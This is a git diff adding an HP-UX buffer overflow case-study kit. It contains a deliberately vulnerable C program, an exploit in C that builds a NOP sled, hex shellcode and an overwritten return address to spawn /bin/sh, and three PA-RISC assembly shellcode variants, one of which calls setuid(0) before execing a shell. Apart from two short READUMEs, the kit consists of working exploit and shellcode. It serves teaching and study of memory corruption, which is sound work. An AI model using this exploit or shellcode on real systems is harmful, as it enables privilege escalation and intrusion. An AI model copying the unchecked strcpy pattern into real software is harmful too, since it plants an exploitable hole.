initial

11 files changed, 298 insertions, 0 deletions

diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz
new file mode 100644
index 0000000..6fa3a5e
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools.tar.gz
diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile
new file mode 100644
index 0000000..19e8fd4
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/Makefile
@@ -0,0 +1,5 @@
+all: sample-one shell-one shell-two shell-tree
+
+
+sample-one:
+        @cd sample-one && make
diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README
new file mode 100644
index 0000000..b6ee0df
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/README
@@ -0,0 +1,10 @@
+This archive contains following files:
+Makefile - make file to build the stuff
+sample-one - example of exploit and vulnerable program
+shell-one.s - shellcode (v1)
+shell-tree.s - shellcode (v2)
+shell-two.s  - shellcode (v3)
+
+
+--
+fygrave@tigerteam.net
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
new file mode 100644
index 0000000..aea8390
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile
@@ -0,0 +1,10 @@
+all: exploit vuln
+
+exploit: exploit.c
+        gcc exploit.c -o exploit
+vuln: vuln.c
+        gcc vuln.c -o vuln
+
+
+clean:
+        @rm -f core *.core *.o vuln exploit a.out
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README
new file mode 100644
index 0000000..66be971
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/README
@@ -0,0 +1,5 @@
+These are examples for HP-UX buffer overflow case study. For more information 
+please see http://www.notlsd.net/bof/
+
+-- 
+fygrave@tigerteam.net                           Tue Mar 20 15:41:48 ICT 2001
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
new file mode 100644
index 0000000..11dc23c
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c
@@ -0,0 +1,123 @@
+/*
+ * Sample exploit for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <unistd.h>
+
+
+char shellcode[]=
+"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
+"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
+"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";
+
+#define BUFFER_SIZE 180
+#define STACK_DSO -84
+#define NOP 0x0b390280
+#define PAD 0
+#define ALIGN 8
+#define ADB_PATH "/usr/bin/adb"
+#define VULNVAR "VULNBUF="
+#define MORE 1
+
+
+unsigned long get_sp(void)
+{
+   __asm__("copy %sp,%ret0 \n");
+}
+
+int main(int argc, char **argv) {
+int i, dso, align, padd, buf_size, adb, more;
+char *buf, *ptr;
+unsigned long retaddr;
+
+
+dso = STACK_DSO;
+align = ALIGN;
+padd = PAD;
+buf_size = BUFFER_SIZE;
+retaddr = 0;
+more = MORE;
+
+
+
+
+while ((i = getopt(argc, argv,
+                   "Dd:b:r:o:a:p:m:")) != EOF) {
+        switch (i) {
+        case 'd':
+        dso=(int) strtol(optarg, NULL, 0);
+        break;
+        case 'm':
+        more+=(int) strtol(optarg, NULL, 0);
+        break;
+        case 'b':
+        buf_size=(int)strtol(optarg, NULL, 0);
+        break;
+    case 'r':
+        retaddr = strtoul(optarg, NULL, 0);
+        break;
+        case 'a':
+            align = (int) strtol(optarg, NULL, 0);
+            break;
+        case 'p':
+            padd = (int) strtol(optarg, NULL, 0);
+            break;
+    case 'D':
+        adb = 1;  
+        break;
+        default:
+            fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
+            "[-r return_address]"
+                    "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
+            exit(1);
+            break;
+        }
+}
+
+
+buf=(char *)calloc(strlen(VULNVAR) + buf_size
+                   + sizeof(unsigned long)*more + 1, 1);
+ptr=buf;
+if (!buf) {
+    perror("calloc");
+    exit(1);
+}
+
+fprintf(stderr,"our stack %X\n",get_sp());
+if (!retaddr)
+    retaddr=get_sp()- dso + 3;
+fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
+                " buf_len: %i dso: %i more: %i\n",
+        retaddr, padd, align, buf_size, dso, more);
+
+strcpy(buf, VULNVAR);
+ptr+=strlen(VULNVAR);
+for(i=0;i<align; i++) *ptr++='A'; // fill in alignment
+
+for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
+    *ptr++=(NOP>>24)&0xff;
+    *ptr++=(NOP>>16)&0xff;
+    *ptr++=(NOP>>8)&0xff;
+    *ptr++=(NOP)&0xff;
+}
+
+strcat(buf, shellcode); // append shellcode
+ptr+=strlen(shellcode);
+
+for(i=0;i<padd; i++) *ptr++='B'; // padd
+
+for (i=0;i<more ; i++) {
+    *ptr++=(retaddr>>24)&0xff;
+    *ptr++=(retaddr>>16)&0xff;
+    *ptr++=(retaddr>>8)&0xff;
+    *ptr++=(retaddr)&0xff;
+}
+fprintf(stderr,"buflen is %i\n", strlen(buf));
+putenv(buf,1);
+if (adb) 
+    execl(ADB_PATH,"adb","vuln", NULL);
+else     
+    execl("./vuln","vuln",buf, NULL);
+perror("execl");
+return 0; // uff
+}
diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
new file mode 100644
index 0000000..698af76
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c
@@ -0,0 +1,34 @@
+/*
+ * Sample vulnerable program for HP-UX buffer overflows case study
+ */
+#include <stdio.h>
+#include <stdlib.h>
+
+
+unsigned long get_sp(void)
+{
+   __asm__("copy %sp,%ret0 \n");
+}
+
+void baz(char *argument) {
+    char badbuf[200];
+
+        printf("badbuf ptr is: %p\n",badbuf);
+        strcpy(badbuf,argument);
+}
+
+void foo(char *arg) {
+
+    baz(arg);
+
+}
+
+int main(int argc, char **argv) {
+char *param;
+
+printf("vuln stack is: 0x%X\n",get_sp());
+param=getenv("VULNBUF");
+foo(param);
+
+return 0;
+}
diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s
new file mode 100644
index 0000000..afbf9f8
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-one.s
@@ -0,0 +1,39 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        xor     %r26, %r26, %r26; 0 - argv0
+        ldil    L%0xc0000000,%r1;  entry point
+        ble     0x4(%sr7,%r1)    ;
+        ldi     23, %r22
+
+jump
+        bl      .+8,%r1      ; address into %r1
+        nop
+        stb     %r0, SHELL-jump+7-11(%sr0,%r1)
+
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-jump-11, %r26;
+        add     %r1, %r26, %r26;
+
+        ldil    L%0xc0000000,%r1;  entry point
+        ble     0x4(%sr7,%r1)    ;
+        ldi     11, %r22;
+
+        xor     %r26, %r26, %r26; return 0
+        ldil    L%0xc0000000,%r1;  entry point
+        ble     0x4(%sr7,%r1)    ;
+        ldi     1, %r22          ; exit 
+
+SHELL
+                .STRING "/bin/shA";
+
+endofshellcode
diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s
new file mode 100644
index 0000000..c3044da
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-tree.s
@@ -0,0 +1,31 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+
+        bl      .+4,%r1      ; address into %r1
+        addi    500, %r1, %r3;
+        stb     %r0, SHELL-shellcode+7-11-500(%sr0,%r3)
+
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-shellcode-11-500, %r26;
+        add     %r3, %r26, %r26;
+
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    511, %r22, %r22 ;
+
+
+SHELL
+                .STRING "/bin/shA";
+
+endofshellcode
diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
+    .SPACE $TEXT$
+    .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+    .align 4
+    .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+    bl         shellcode, %r1
+    nop
+    .SUBSPA $DATA$
+    .EXPORT shellcode; So we could see it in debugger
+shellcode
+        xor     %r26, %r26, %r26; 0 - argv0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    523, %r22, %r22 ; setuid(0)
+jump
+        bl      .+4,%r1      ; address into %r1
+        addi    500, %r1, %r3;
+        stb     %r0, SHELL-jump+7-11-500(%sr0,%r3)
+
+        xor     %r25, %r25, %r25; NULL ->arg1
+        ldi     SHELL-jump-11-500, %r26;
+        add     %r3, %r26, %r26;
+
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    511, %r22, %r22 ;
+
+        xor     %r26, %r26, %r26; return 0
+        ldil    L%0xc0000000,%r1;  entry point
+        ldi     500, %r22       ;
+        ble     0x4(%sr7,%r1)   ;
+        subi    501, %r22, %r22 ; exit 
+
+SHELL
+                .STRING "/bin/shA";
+
+endofshellcode
diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf
new file mode 100644
index 0000000..6d2a957
--- /dev/null
+++ b/other/shellkit/tmp/hpux_bof.pdf